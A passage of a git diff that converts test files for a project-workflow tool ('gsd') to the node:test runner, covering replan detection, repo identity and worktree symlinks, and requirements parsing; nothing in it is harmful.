@@ -464,10 +463,10 @@ console.log('\n=== doctor: blocker + no REPLAN.md → blocker_discovered_no_repl
 
   const report = await runGSDDoctor(base, { fix: false, scope: 'M001/S01' });
   const blockerIssues = report.issues.filter(i => i.code === 'blocker_discovered_no_replan');
-  assertTrue(blockerIssues.length > 0, 'doctor emits blocker_discovered_no_replan when blocker + no REPLAN');
-  assertTrue(blockerIssues[0]?.message.includes('T01'), 'issue message mentions the blocker task T01');
-  assertEq(blockerIssues[0]?.severity, 'warning', 'blocker_discovered_no_replan is warning severity');
-  assertEq(blockerIssues[0]?.scope, 'slice', 'blocker_discovered_no_replan has slice scope');
+  assert.ok(blockerIssues.length > 0, 'doctor emits blocker_discovered_no_replan when blocker + no REPLAN');
+  assert.ok(blockerIssues[0]?.message.includes('T01'), 'issue message mentions the blocker task T01');
+  assert.deepStrictEqual(blockerIssues[0]?.severity, 'warning', 'blocker_discovered_no_replan is warning severity');
+  assert.deepStrictEqual(blockerIssues[0]?.scope, 'slice', 'blocker_discovered_no_replan has slice scope');
   rmSync(base, { recursive: true, force: true });
 }
 
@@ -482,7 +481,7 @@ console.log('\n=== doctor: blocker + REPLAN.md exists → no blocker_discovered_
 
   const report = await runGSDDoctor(base, { fix: false, scope: 'M001/S01' });
   const blockerIssues = report.issues.filter(i => i.code === 'blocker_discovered_no_replan');
-  assertEq(blockerIssues.length, 0, 'no blocker_discovered_no_replan when REPLAN.md exists');
+  assert.deepStrictEqual(blockerIssues.length, 0, 'no blocker_discovered_no_replan when REPLAN.md exists');
   rmSync(base, { recursive: true, force: true });
 }
 
@@ -496,7 +495,7 @@ console.log('\n=== doctor: no blocker → no blocker_discovered_no_replan issue
 
   const report = await runGSDDoctor(base, { fix: false, scope: 'M001/S01' });
   const blockerIssues = report.issues.filter(i => i.code === 'blocker_discovered_no_replan');
-  assertEq(blockerIssues.length, 0, 'no blocker_discovered_no_replan when no blocker');
+  assert.deepStrictEqual(blockerIssues.length, 0, 'no blocker_discovered_no_replan when no blocker');
   rmSync(base, { recursive: true, force: true });
 }
 
@@ -504,50 +503,48 @@ console.log('\n=== doctor: no blocker → no blocker_discovered_no_replan issue
 // Artifact Resolution: resolveExpectedArtifactPath for replan-slice (#858)
 // ═══════════════════════════════════════════════════════════════════════════
 
-import { resolveExpectedArtifactPath, verifyExpectedArtifact } from '../auto-recovery.ts';
+import { resolveExpectedArtifactPath } from '../auto-artifact-paths.ts';
+import { verifyExpectedArtifact } from '../auto-recovery.ts';
 
-console.log('\n=== artifact: resolveExpectedArtifactPath returns REPLAN.md path for replan-slice ===');
-{
+
+describe('replan-slice', () => {
+test('artifact: resolveExpectedArtifactPath returns REPLAN.md path for replan-slice', () => {
   const base = createFixtureBase();
   writeRoadmap(base, 'M001', ROADMAP_ONE_SLICE);
   writePlan(base, 'M001', 'S01', makePlanT01DoneT02Pending());
 
   const path = resolveExpectedArtifactPath('replan-slice', 'M001/S01', base);
-  assertTrue(path !== null, 'resolveExpectedArtifactPath returns non-null for replan-slice');
-  assertTrue(path!.endsWith('S01-REPLAN.md'), 'path ends with S01-REPLAN.md');
+  assert.ok(path !== null, 'resolveExpectedArtifactPath returns non-null for replan-slice');
+  assert.ok(path!.endsWith('S01-REPLAN.md'), 'path ends with S01-REPLAN.md');
   rmSync(base, { recursive: true, force: true });
-}
+});
 
-console.log('\n=== artifact: verifyExpectedArtifact fails when REPLAN.md missing (#858) ===');
-{
+test('artifact: verifyExpectedArtifact fails when REPLAN.md missing (#858)', () => {
   const base = createFixtureBase();
   writeRoadmap(base, 'M001', ROADMAP_ONE_SLICE);
   writePlan(base, 'M001', 'S01', makePlanT01DoneT02Pending());
 
   const result = verifyExpectedArtifact('replan-slice', 'M001/S01', base);
-  assertEq(result, false, 'verifyExpectedArtifact returns false when REPLAN.md is missing');
+  assert.deepStrictEqual(result, false, 'verifyExpectedArtifact returns false when REPLAN.md is missing');
   rmSync(base, { recursive: true, force: true });
-}
+});
 
-console.log('\n=== artifact: verifyExpectedArtifact passes when REPLAN.md exists (#858) ===');
-{
+test('artifact: verifyExpectedArtifact passes when REPLAN.md exists (#858)', () => {
   const base = createFixtureBase();
   writeRoadmap(base, 'M001', ROADMAP_ONE_SLICE);
   writePlan(base, 'M001', 'S01', makePlanT01DoneT02Pending());
   writeReplanFile(base, 'M001', 'S01', '# Replan\n\nBlocker addressed.');
 
   const result = verifyExpectedArtifact('replan-slice', 'M001/S01', base);
-  assertEq(result, true, 'verifyExpectedArtifact returns true when REPLAN.md exists');
+  assert.deepStrictEqual(result, true, 'verifyExpectedArtifact returns true when REPLAN.md exists');
   rmSync(base, { recursive: true, force: true });
-}
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // REPLAN-TRIGGER.md detection (triage-initiated replan, #1701)
 // ═══════════════════════════════════════════════════════════════════════════
-
 // (a) REPLAN-TRIGGER.md exists + no REPLAN.md → replanning-slice
-console.log('\n=== deriveState: REPLAN-TRIGGER.md exists, no REPLAN → replanning-slice (#1701) ===');
-{
+test('deriveState: REPLAN-TRIGGER.md exists, no REPLAN → replanning-slice (#1701)', async () => {
   const base = createFixtureBase();
   writeRoadmap(base, 'M001', ROADMAP_ONE_SLICE);
   writePlan(base, 'M001', 'S01', makePlanT01DoneT02Pending());
@@ -556,17 +553,16 @@ console.log('\n=== deriveState: REPLAN-TRIGGER.md exists, no REPLAN → replanni
   writeReplanTrigger(base, 'M001', 'S01', '# Replan Trigger\n\n**Source:** Capture C001\n');
 
   const state = await deriveState(base);
-  assertEq(state.phase, 'replanning-slice', 'phase is replanning-slice when REPLAN-TRIGGER.md exists');
-  assertTrue(state.blockers.length > 0, 'blockers array is non-empty for triage replan trigger');
-  assertTrue(state.nextAction.includes('Triage replan'), 'nextAction mentions triage replan');
-  assertEq(state.activeSlice?.id, 'S01', 'activeSlice is S01');
-  assertEq(state.activeTask?.id, 'T02', 'activeTask is T02 (next incomplete task)');
+  assert.deepStrictEqual(state.phase, 'replanning-slice', 'phase is replanning-slice when REPLAN-TRIGGER.md exists');
+  assert.ok(state.blockers.length > 0, 'blockers array is non-empty for triage replan trigger');
+  assert.ok(state.nextAction.includes('Triage replan'), 'nextAction mentions triage replan');
+  assert.deepStrictEqual(state.activeSlice?.id, 'S01', 'activeSlice is S01');
+  assert.deepStrictEqual(state.activeTask?.id, 'T02', 'activeTask is T02 (next incomplete task)');
   rmSync(base, { recursive: true, force: true });
-}
+});
 
 // (b) REPLAN-TRIGGER.md + REPLAN.md both exist → executing (loop protection)
-console.log('\n=== deriveState: REPLAN-TRIGGER.md + REPLAN.md → executing (loop protection, #1701) ===');
-{
+test('deriveState: REPLAN-TRIGGER.md + REPLAN.md → executing (loop protection, #1701)', async () => {
   const base = createFixtureBase();
   writeRoadmap(base, 'M001', ROADMAP_ONE_SLICE);
   writePlan(base, 'M001', 'S01', makePlanT01DoneT02Pending());
@@ -575,27 +571,25 @@ console.log('\n=== deriveState: REPLAN-TRIGGER.md + REPLAN.md → executing (loo
   writeReplanFile(base, 'M001', 'S01', '# Replan\n\nAlready replanned.');
 
   const state = await deriveState(base);
-  assertEq(state.phase, 'executing', 'phase is executing when REPLAN.md exists (loop protection)');
-  assertEq(state.activeTask?.id, 'T02', 'activeTask is T02');
+  assert.deepStrictEqual(state.phase, 'executing', 'phase is executing when REPLAN.md exists (loop protection)');
+  assert.deepStrictEqual(state.activeTask?.id, 'T02', 'activeTask is T02');
   rmSync(base, { recursive: true, force: true });
-}
+});
 
 // (c) No REPLAN-TRIGGER.md, no blocker → executing (no false positive)
-console.log('\n=== deriveState: no REPLAN-TRIGGER.md, no blocker → executing (#1701) ===');
-{
+test('deriveState: no REPLAN-TRIGGER.md, no blocker → executing (#1701)', async () => {
   const base = createFixtureBase();
   writeRoadmap(base, 'M001', ROADMAP_ONE_SLICE);
   writePlan(base, 'M001', 'S01', makePlanT01DoneT02Pending());
   writeTaskSummary(base, 'M001', 'S01', 'T01', makeTaskSummary('T01', false));
 
   const state = await deriveState(base);
-  assertEq(state.phase, 'executing', 'phase is executing when no trigger and no blocker');
+  assert.deepStrictEqual(state.phase, 'executing', 'phase is executing when no trigger and no blocker');
   rmSync(base, { recursive: true, force: true });
-}
+});
 
 // (d) blocker_discovered takes priority over REPLAN-TRIGGER.md
-console.log('\n=== deriveState: blocker_discovered takes priority over REPLAN-TRIGGER.md (#1701) ===');
-{
+test('deriveState: blocker_discovered takes priority over REPLAN-TRIGGER.md (#1701)', async () => {
   const base = createFixtureBase();
   writeRoadmap(base, 'M001', ROADMAP_ONE_SLICE);
   writePlan(base, 'M001', 'S01', makePlanT01DoneT02Pending());
@@ -603,10 +597,10 @@ console.log('\n=== deriveState: blocker_discovered takes priority over REPLAN-TR
   writeReplanTrigger(base, 'M001', 'S01', '# Replan Trigger\n\n**Source:** Capture C001\n');
 
   const state = await deriveState(base);
-  assertEq(state.phase, 'replanning-slice', 'phase is replanning-slice');
+  assert.deepStrictEqual(state.phase, 'replanning-slice', 'phase is replanning-slice');
   // blocker_discovered path should fire first (blockerTaskId is set, so REPLAN-TRIGGER check is skipped)
-  assertTrue(state.nextAction.includes('T01'), 'nextAction mentions blocker task T01 (blocker path, not trigger path)');
+  assert.ok(state.nextAction.includes('T01'), 'nextAction mentions blocker task T01 (blocker path, not trigger path)');
   rmSync(base, { recursive: true, force: true });
-}
+});
 
-report();
+});
diff --git a/src/resources/extensions/gsd/tests/repo-identity-worktree.test.ts b/src/resources/extensions/gsd/tests/repo-identity-worktree.test.ts
index cdea4611a..e576188db 100644
--- a/src/resources/extensions/gsd/tests/repo-identity-worktree.test.ts
+++ b/src/resources/extensions/gsd/tests/repo-identity-worktree.test.ts
@@ -1,13 +1,11 @@
+import { describe, test, before, after } from 'node:test';
+import assert from 'node:assert/strict';
 import { mkdtempSync, rmSync, writeFileSync, existsSync, lstatSync, realpathSync, mkdirSync, symlinkSync, renameSync } from "node:fs";
 import { join } from "node:path";
 import { tmpdir } from "node:os";
 import { execSync } from "node:child_process";
 
 import { repoIdentity, externalGsdRoot, ensureGsdSymlink, validateProjectId, readRepoMeta, isInheritedRepo } from "../repo-identity.ts";
-import { createTestContext } from "./test-helpers.ts";
-
-const { assertEq, assertTrue, report } = createTestContext();
-
 /**
  * Normalize a path for reliable comparison on Windows CI runners.
  * `os.tmpdir()` may return the 8.3 short-path form (e.g. `C:\Users\RUNNER~1`)
@@ -23,11 +21,15 @@ function run(command: string, cwd: string): string {
   return execSync(command, { cwd, stdio: ["ignore", "pipe", "pipe"], encoding: "utf-8" }).trim();
 }
 
-async function main(): Promise<void> {
-  const base = realpathSync(mkdtempSync(join(tmpdir(), "gsd-repo-identity-")));
-  const stateDir = realpathSync(mkdtempSync(join(tmpdir(), "gsd-state-")));
+describe('repo-identity-worktree', () => {
+  let base: string;
+  let stateDir: string;
+  let worktreePath: string;
+  let expectedExternalState: string;
 
-  try {
+  before(() => {
+    base = realpathSync(mkdtempSync(join(tmpdir(), "gsd-repo-identity-")));
+    stateDir = realpathSync(mkdtempSync(join(tmpdir(), "gsd-state-")));
     process.env.GSD_STATE_DIR = stateDir;
 
     run("git init -b main", base);
@@ -38,57 +40,69 @@ async function main(): Promise<void> {
     run("git add README.md", base);
     run('git commit -m "chore: init"', base);
 
-    const worktreePath = join(base, ".gsd", "worktrees", "M001");
+    worktreePath = join(base, ".gsd", "worktrees", "M001");
     run(`git worktree add -b milestone/M001 ${worktreePath}`, base);
 
-    console.log("\n=== ensureGsdSymlink points worktree at main repo external state dir ===");
-    const expectedExternalState = externalGsdRoot(base);
-    const mainState = ensureGsdSymlink(base);
-    assertEq(mainState, realpathSync(join(base, ".gsd")), "ensureGsdSymlink(base) returns the current main repo .gsd target");
-    const worktreeState = ensureGsdSymlink(worktreePath);
-    assertEq(worktreeState, expectedExternalState, "worktree symlink target matches main repo external state dir");
-    assertTrue(existsSync(join(worktreePath, ".gsd")), "worktree .gsd exists");
-    assertTrue(lstatSync(join(worktreePath, ".gsd")).isSymbolicLink(), "worktree .gsd is a symlink");
-    assertEq(realpathSync(join(worktreePath, ".gsd")), realpathSync(expectedExternalState), "worktree .gsd symlink resolves to main repo external state dir");
+    expectedExternalState = externalGsdRoot(base);
+  });
 
-    console.log("\n=== ensureGsdSymlink heals stale worktree symlinks ===");
+  after(() => {
+    delete process.env.GSD_PROJECT_ID;
+    delete process.env.GSD_STATE_DIR;
+    rmSync(base, { recursive: true, force: true });
+    rmSync(stateDir, { recursive: true, force: true });
+  });
+
+test('ensureGsdSymlink points worktree at main repo external state dir', () => {
+    const mainState = ensureGsdSymlink(base);
+    assert.deepStrictEqual(mainState, realpathSync(join(base, ".gsd")), "ensureGsdSymlink(base) returns the current main repo .gsd target");
+    const worktreeState = ensureGsdSymlink(worktreePath);
+    assert.deepStrictEqual(worktreeState, expectedExternalState, "worktree symlink target matches main repo external state dir");
+    assert.ok(existsSync(join(worktreePath, ".gsd")), "worktree .gsd exists");
+    assert.ok(lstatSync(join(worktreePath, ".gsd")).isSymbolicLink(), "worktree .gsd is a symlink");
+    assert.deepStrictEqual(realpathSync(join(worktreePath, ".gsd")), realpathSync(expectedExternalState), "worktree .gsd symlink resolves to main repo external state dir");
+});
+
+test('ensureGsdSymlink heals stale worktree symlinks', () => {
     const staleState = join(stateDir, "projects", "stale-worktree-state");
     mkdirSync(staleState, { recursive: true });
     rmSync(join(worktreePath, ".gsd"), { recursive: true, force: true });
     symlinkSync(staleState, join(worktreePath, ".gsd"), "junction");
     const healedState = ensureGsdSymlink(worktreePath);
-    assertEq(healedState, expectedExternalState, "stale worktree symlink is repaired to canonical external state dir");
-    assertEq(realpathSync(join(worktreePath, ".gsd")), realpathSync(expectedExternalState), "healed worktree symlink resolves to canonical external state dir");
+    assert.deepStrictEqual(healedState, expectedExternalState, "stale worktree symlink is repaired to canonical external state dir");
+    assert.deepStrictEqual(realpathSync(join(worktreePath, ".gsd")), realpathSync(expectedExternalState), "healed worktree symlink resolves to canonical external state dir");
+});
 
-    console.log("\n=== ensureGsdSymlink preserves worktree .gsd directories ===");
+test('ensureGsdSymlink preserves worktree .gsd directories', () => {
     rmSync(join(worktreePath, ".gsd"), { recursive: true, force: true });
     mkdirSync(join(worktreePath, ".gsd", "milestones"), { recursive: true });
     writeFileSync(join(worktreePath, ".gsd", "milestones", "stale.txt"), "stale\n", "utf-8");
     const preservedDirState = ensureGsdSymlink(worktreePath);
-    assertEq(preservedDirState, join(worktreePath, ".gsd"), "worktree .gsd directory is left in place for sync-based refresh");
-    assertTrue(lstatSync(join(worktreePath, ".gsd")).isDirectory(), "worktree .gsd directory remains a directory");
-    assertTrue(existsSync(join(worktreePath, ".gsd", "milestones", "stale.txt")), "existing worktree .gsd directory contents remain available for sync logic");
+    assert.deepStrictEqual(preservedDirState, join(worktreePath, ".gsd"), "worktree .gsd directory is left in place for sync-based refresh");
+    assert.ok(lstatSync(join(worktreePath, ".gsd")).isDirectory(), "worktree .gsd directory remains a directory");
+    assert.ok(existsSync(join(worktreePath, ".gsd", "milestones", "stale.txt")), "existing worktree .gsd directory contents remain available for sync logic");
+});
 
-    console.log("\n=== GSD_PROJECT_ID overrides computed repo hash ===");
+test('GSD_PROJECT_ID overrides computed repo hash', () => {
     process.env.GSD_PROJECT_ID = "my-project";
-    assertEq(repoIdentity(base), "my-project", "repoIdentity returns GSD_PROJECT_ID when set");
-    assertEq(externalGsdRoot(base), join(stateDir, "projects", "my-project"), "externalGsdRoot uses GSD_PROJECT_ID");
+    assert.deepStrictEqual(repoIdentity(base), "my-project", "repoIdentity returns GSD_PROJECT_ID when set");
+    assert.deepStrictEqual(externalGsdRoot(base), join(stateDir, "projects", "my-project"), "externalGsdRoot uses GSD_PROJECT_ID");
     delete process.env.GSD_PROJECT_ID;
+});
 
-    console.log("\n=== GSD_PROJECT_ID falls back to hash when unset ===");
+test('GSD_PROJECT_ID falls back to hash when unset', () => {
     const hashIdentity = repoIdentity(base);
-    assertTrue(/^[0-9a-f]{12}$/.test(hashIdentity), "repoIdentity returns 12-char hex hash when GSD_PROJECT_ID is unset");
+    assert.ok(/^[0-9a-f]{12}$/.test(hashIdentity), "repoIdentity returns 12-char hex hash when GSD_PROJECT_ID is unset");
+});
 
-    console.log("\n=== readRepoMeta returns null for malformed metadata ===");
-    {
+test('readRepoMeta returns null for malformed metadata', () => {
       const malformedPath = join(stateDir, "projects", "malformed");
       mkdirSync(malformedPath, { recursive: true });
       writeFileSync(join(malformedPath, "repo-meta.json"), JSON.stringify({ version: 1 }) + "\n", "utf-8");
-      assertEq(readRepoMeta(malformedPath), null, "malformed repo-meta.json is treated as unknown metadata");
-    }
+      assert.deepStrictEqual(readRepoMeta(malformedPath), null, "malformed repo-meta.json is treated as unknown metadata");
+});
 
-    console.log("\n=== ensureGsdSymlink refreshes repo-meta gitRoot after repo move with fixed project id ===");
-    {
+test('ensureGsdSymlink refreshes repo-meta gitRoot after repo move with fixed project id', () => {
       const moveRepo = realpathSync(mkdtempSync(join(tmpdir(), "gsd-repo-identity-move-")));
       run("git init -b main", moveRepo);
       run('git config user.name "Pi Test"', moveRepo);
@@ -100,26 +114,25 @@ async function main(): Promise<void> {
       process.env.GSD_PROJECT_ID = "fixed-project";
       const fixedExternal = ensureGsdSymlink(moveRepo);
       const before = readRepoMeta(fixedExternal);
-      assertTrue(before !== null, "repo metadata exists before repo move");
-      assertEq(normalizePath(before!.gitRoot), normalizePath(moveRepo), "repo metadata tracks current git root before move");
+      assert.ok(before !== null, "repo metadata exists before repo move");
+      assert.deepStrictEqual(normalizePath(before!.gitRoot), normalizePath(moveRepo), "repo metadata tracks current git root before move");
 
       const movedBaseRaw = join(tmpdir(), `gsd-repo-identity-moved-${Date.now()}-${Math.random().toString(36).slice(2)}`);
       renameSync(moveRepo, movedBaseRaw);
       const movedBase = realpathSync(movedBaseRaw);
       const movedExternal = ensureGsdSymlink(movedBase);
-      assertEq(realpathSync(movedExternal), realpathSync(fixedExternal), "fixed project id keeps the same external state dir");
+      assert.deepStrictEqual(realpathSync(movedExternal), realpathSync(fixedExternal), "fixed project id keeps the same external state dir");
 
       const after = readRepoMeta(movedExternal);
-      assertTrue(after !== null, "repo metadata exists after repo move");
-      assertEq(normalizePath(after!.gitRoot), normalizePath(movedBase), "repo metadata gitRoot is refreshed to moved repo path");
-      assertEq(after!.createdAt, before!.createdAt, "repo metadata preserves createdAt on refresh");
+      assert.ok(after !== null, "repo metadata exists after repo move");
+      assert.deepStrictEqual(normalizePath(after!.gitRoot), normalizePath(movedBase), "repo metadata gitRoot is refreshed to moved repo path");
+      assert.deepStrictEqual(after!.createdAt, before!.createdAt, "repo metadata preserves createdAt on refresh");
 
       rmSync(movedBase, { recursive: true, force: true });
       delete process.env.GSD_PROJECT_ID;
-    }
+});
 
-    console.log("\n=== isInheritedRepo detects subdirectory of parent repo without .gsd (#1639) ===");
-    {
+test('isInheritedRepo detects subdirectory of parent repo without .gsd (#1639)', () => {
       const parentRepo = realpathSync(mkdtempSync(join(tmpdir(), "gsd-inherited-parent-")));
       run("git init -b main", parentRepo);
       run('git config user.name "Pi Test"', parentRepo);
@@ -128,31 +141,26 @@ async function main(): Promise<void> {
       run("git add README.md", parentRepo);
       run('git commit -m "init"', parentRepo);
 
-      // Create a subdirectory — no .gsd at parent
       const subdir = join(parentRepo, "newproject");
       mkdirSync(subdir, { recursive: true });
-      assertTrue(isInheritedRepo(subdir), "subdirectory of parent repo without .gsd is inherited");
+      assert.ok(isInheritedRepo(subdir), "subdirectory of parent repo without .gsd is inherited");
 
-      // After adding .gsd at parent, subdirectory is a legitimate child
       mkdirSync(join(parentRepo, ".gsd"), { recursive: true });
-      assertTrue(!isInheritedRepo(subdir), "subdirectory of parent repo WITH .gsd is NOT inherited");
+      assert.ok(!isInheritedRepo(subdir), "subdirectory of parent repo WITH .gsd is NOT inherited");
 
-      // The git root itself is never inherited
-      assertTrue(!isInheritedRepo(parentRepo), "git root is not inherited");
+      assert.ok(!isInheritedRepo(parentRepo), "git root is not inherited");
 
-      // A standalone repo (not a subdir) is not inherited
       const standaloneRepo = realpathSync(mkdtempSync(join(tmpdir(), "gsd-inherited-standalone-")));
       run("git init -b main", standaloneRepo);
       run('git config user.name "Pi Test"', standaloneRepo);
       run('git config user.email "pi@example.com"', standaloneRepo);
-      assertTrue(!isInheritedRepo(standaloneRepo), "standalone repo is not inherited");
+      assert.ok(!isInheritedRepo(standaloneRepo), "standalone repo is not inherited");
 
       rmSync(parentRepo, { recursive: true, force: true });
       rmSync(standaloneRepo, { recursive: true, force: true });
-    }
+});
 
-    console.log("\n=== subdirectory of parent repo gets unique identity after git init (#1639) ===");
-    {
+test('subdirectory of parent repo gets unique identity after git init (#1639)', () => {
       const parentRepo = realpathSync(mkdtempSync(join(tmpdir(), "gsd-identity-parent-")));
       run("git init -b main", parentRepo);
       run('git config user.name "Pi Test"', parentRepo);
@@ -165,38 +173,59 @@ async function main(): Promise<void> {
       const subdir = join(parentRepo, "childproject");
       mkdirSync(subdir, { recursive: true });
 
-      // Before git init, subdirectory shares parent's identity
       const parentIdentity = repoIdentity(parentRepo);
       const subdirIdentityBefore = repoIdentity(subdir);
-      assertEq(subdirIdentityBefore, parentIdentity, "subdirectory shares parent identity before its own git init");
+      assert.deepStrictEqual(subdirIdentityBefore, parentIdentity, "subdirectory shares parent identity before its own git init");
 
-      // After git init, subdirectory gets its own identity
       run("git init -b main", subdir);
       const subdirIdentityAfter = repoIdentity(subdir);
-      assertTrue(subdirIdentityAfter !== parentIdentity, "subdirectory gets unique identity after git init");
+      assert.ok(subdirIdentityAfter !== parentIdentity, "subdirectory gets unique identity after git init");
 
       rmSync(parentRepo, { recursive: true, force: true });
-    }
-
-    console.log("\n=== validateProjectId rejects invalid values ===");
-    for (const invalid of ["has spaces", "path/traversal", "dot..dot", "back\\slash"]) {
-      assertTrue(!validateProjectId(invalid), `validateProjectId rejects invalid value: "${invalid}"`);
-    }
-
-    console.log("\n=== validateProjectId accepts valid values ===");
-    for (const valid of ["my-project", "foo_bar", "abc123", "A-Z_0-9"]) {
-      assertTrue(validateProjectId(valid), `validateProjectId accepts valid value: "${valid}"`);
-    }
-  } finally {
-    delete process.env.GSD_PROJECT_ID;
-    delete process.env.GSD_STATE_DIR;
-    rmSync(base, { recursive: true, force: true });
-    rmSync(stateDir, { recursive: true, force: true });
-    report();
-  }
-}
-
-main().catch((error) => {
-  console.error(error);
-  process.exit(1);
+});
+
+test('ensureGsdSymlink from subdirectory does not create .gsd in subdir when git-root .gsd exists (#2380)', () => {
+    const repo = realpathSync(mkdtempSync(join(tmpdir(), "gsd-subdir-symlink-")));
+    run("git init -b main", repo);
+    run('git config user.name "Pi Test"', repo);
+    run('git config user.email "pi@example.com"', repo);
+    run('git remote add origin git@github.com:example/subdir-test.git', repo);
+    writeFileSync(join(repo, "README.md"), "# Subdir Test\n", "utf-8");
+    run("git add README.md", repo);
+    run('git commit -m "init"', repo);
+
+    // Set up .gsd symlink at the git root (normal project initialisation)
+    ensureGsdSymlink(repo);
+    assert.ok(existsSync(join(repo, ".gsd")), "root .gsd exists after ensureGsdSymlink");
+    assert.ok(lstatSync(join(repo, ".gsd")).isSymbolicLink(), "root .gsd is a symlink");
+
+    // Create a subdirectory and call ensureGsdSymlink from there
+    const subdir = join(repo, "src", "lib");
+    mkdirSync(subdir, { recursive: true });
+    ensureGsdSymlink(subdir);
+
+    // ensureGsdSymlink should NOT create a .gsd in the subdirectory
+    // because the git root already has a valid .gsd symlink.
+    assert.ok(!existsSync(join(subdir, ".gsd")), "no .gsd created in subdirectory when git-root .gsd exists (#2380)");
+    assert.ok(!existsSync(join(repo, "src", ".gsd")), "no .gsd created in intermediate directory");
+
+    // The root .gsd should still be intact
+    assert.ok(existsSync(join(repo, ".gsd")), "root .gsd still exists");
+    assert.ok(lstatSync(join(repo, ".gsd")).isSymbolicLink(), "root .gsd is still a symlink");
+
+    rmSync(repo, { recursive: true, force: true });
+});
+
+test('validateProjectId rejects invalid values', () => {
+    for (const invalid of ["has spaces", "path/traversal", "dot..dot", "back\\slash"]) {
+      assert.ok(!validateProjectId(invalid), `validateProjectId rejects invalid value: "${invalid}"`);
+    }
+});
+
+test('validateProjectId accepts valid values', () => {
+    for (const valid of ["my-project", "foo_bar", "abc123", "A-Z_0-9"]) {
+      assert.ok(validateProjectId(valid), `validateProjectId accepts valid value: "${valid}"`);
+    }
+});
+
 });
diff --git a/src/resources/extensions/gsd/tests/requirements.test.ts b/src/resources/extensions/gsd/tests/requirements.test.ts
index 65536ce00..edc2e0897 100644
--- a/src/resources/extensions/gsd/tests/requirements.test.ts
+++ b/src/resources/extensions/gsd/tests/requirements.test.ts
@@ -1,15 +1,15 @@
+import { describe, test, after } from 'node:test';
+import assert from 'node:assert/strict';
 import { parseRequirementCounts } from "../files.ts";
 import { mkdtempSync, mkdirSync, rmSync, writeFileSync } from "node:fs";
 import { join } from "node:path";
 import { tmpdir } from "node:os";
 import { deriveState } from "../state.ts";
 import { runGSDDoctor } from "../doctor.ts";
-import { createTestContext } from './test-helpers.ts';
 
-const { assertEq, assertTrue, report } = createTestContext();
-console.log("\n=== requirement counts parser ===");
-{
-  const counts = parseRequirementCounts(`# Requirements
+describe('requirements', () => {
+  test('requirement counts parser', () => {
+    const counts = parseRequirementCounts(`# Requirements
 
 ## Active
 
@@ -34,73 +34,68 @@ console.log("\n=== requirement counts parser ===");
 ### R030 — No
 - Status: out-of-scope
 `);
-  assertEq(counts.active, 2, "counts active requirements by section");
-  assertEq(counts.validated, 1, "counts validated requirements");
-  assertEq(counts.deferred, 1, "counts deferred requirements");
-  assertEq(counts.outOfScope, 1, "counts out of scope requirements");
-  assertEq(counts.blocked, 1, "counts blocked statuses");
-}
+    assert.deepStrictEqual(counts.active, 2, "counts active requirements by section");
+    assert.deepStrictEqual(counts.validated, 1, "counts validated requirements");
+    assert.deepStrictEqual(counts.deferred, 1, "counts deferred requirements");
+    assert.deepStrictEqual(counts.outOfScope, 1, "counts out of scope requirements");
+    assert.deepStrictEqual(counts.blocked, 1, "counts blocked statuses");
+  });
 
-const base = mkdtempSync(join(tmpdir(), "gsd-requirements-test-"));
-const gsd = join(base, ".gsd");
-const mDir = join(gsd, "milestones", "M001");
-const sDir = join(mDir, "slices", "S01");
-const tDir = join(sDir, "tasks");
-mkdirSync(tDir, { recursive: true });
-writeFileSync(join(gsd, "REQUIREMENTS.md"), `# Requirements
+  const base = mkdtempSync(join(tmpdir(), "gsd-requirements-test-"));
+  const gsd = join(base, ".gsd");
+  const mDir = join(gsd, "milestones", "M001");
+  const sDir = join(mDir, "slices", "S01");
+  const tDir = join(sDir, "tasks");
+  mkdirSync(tDir, { recursive: true });
+  writeFileSync(join(gsd, "REQUIREMENTS.md"), [
+    "# Requirements",
+    "## Active",
+    "### R001 — Missing owner",
+    "- Class: core-capability",
+    "- Status: active",
+    "- Description: thing",
+    "- Why it matters: thing",
+    "- Source: user",
+    "- Primary owning slice: none yet",
+    "- Supporting slices: none",
+    "- Validation: unmapped",
+    "- Notes: none",
+    "## Validated",
+    "## Deferred",
+    "## Out of Scope",
+    "## Traceability",
+    "",
+  ].join("\n"), "utf-8");
+  writeFileSync(join(mDir, "M001-ROADMAP.md"), [
+    "# M001: Demo",
+    "## Slices",
+    "- [ ] **S01: Demo Slice** `risk:low` `depends:[]`",
+    "  > After this: demo works",
+    "",
+  ].join("\n"), "utf-8");
+  writeFileSync(join(sDir, "S01-PLAN.md"), [
+    "# S01: Demo Slice",
+    "**Goal:** Demo",
+    "**Demo:** Demo",
+    "## Must-Haves",
+    "- done",
+    "## Tasks",
+    "- [ ] **T01: Implement thing** `est:10m`",
+    "  Task is in progress.",
+    "",
+  ].join("\n"), "utf-8");
+  test('deriveState includes requirements counts', async () => {
+    const state = await deriveState(base);
+    assert.ok(state.requirements !== undefined, "state includes requirements summary");
+    assert.deepStrictEqual(state.requirements?.active, 1, "state reports active requirement count");
+  });
 
-## Active
+  test('doctor flags orphaned active requirement', async () => {
+    const report = await runGSDDoctor(base);
+    assert.ok(report.issues.some(issue => issue.code === "active_requirement_missing_owner"), "doctor flags missing owner");
+  });
 
-### R001 — Missing owner
-- Class: core-capability
-- Status: active
-- Description: thing
-- Why it matters: thing
-- Source: user
-- Primary owning slice: none yet
-- Supporting slices: none
-- Validation: unmapped
-- Notes: none
-
-## Validated
-
-## Deferred
-
-## Out of Scope
-
-## Traceability
-`, "utf-8");
-writeFileSync(join(mDir, "M001-ROADMAP.md"), `# M001: Demo
-
-## Slices
-- [ ] **S01: Demo Slice** \`risk:low\` \`depends:[]\`
-  > After this: demo works
-`, "utf-8");
-writeFileSync(join(sDir, "S01-PLAN.md"), `# S01: Demo Slice
-
-**Goal:** Demo
-**Demo:** Demo
-
-## Must-Haves
-- done
-
-## Tasks
-- [ ] **T01: Implement thing** \`est:10m\`
-  Task is in progress.
-`, "utf-8");
-
-console.log("\n=== deriveState includes requirements counts ===");
-{
-  const state = await deriveState(base);
-  assertTrue(state.requirements !== undefined, "state includes requirements summary");
-  assertEq(state.requirements?.active, 1, "state reports active requirement count");
-}
-
-console.log("\n=== doctor flags orphaned active requirement ===");
-{
-  const report = await runGSDDoctor(base);
-  assertTrue(report.issues.some(issue => issue.code === "active_requirement_missing_owner"), "doctor flags missing owner");
-}
-
-rmSync(base, { recursive: true, force: true });
-report();
+  after(() => {
+    rmSync(base, { recursive: true, force: true });
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/restore-tools-after-discuss.test.ts b/src/resources/extensions/gsd/tests/restore-tools-after-discuss.test.ts
new file mode 100644
index 000000000..a820125e9
--- /dev/null
